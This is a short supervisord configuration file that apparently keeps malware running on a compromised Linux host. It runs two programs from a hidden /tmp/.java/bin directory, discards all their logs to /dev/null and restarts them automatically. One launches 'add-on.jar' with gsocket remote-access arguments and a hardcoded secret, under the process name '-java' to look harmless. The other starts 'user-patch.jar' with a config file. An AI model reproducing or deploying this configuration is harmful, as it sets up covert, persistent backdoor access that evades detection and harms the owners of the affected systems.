[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./user-patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s iE9c8A7eD2a1E2c-5A16f9813D9g8Hbj7-56C4a961-eCd9F9440-d6A2J8038A1c5J1g60 -liqD"
command=exec -a -java ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true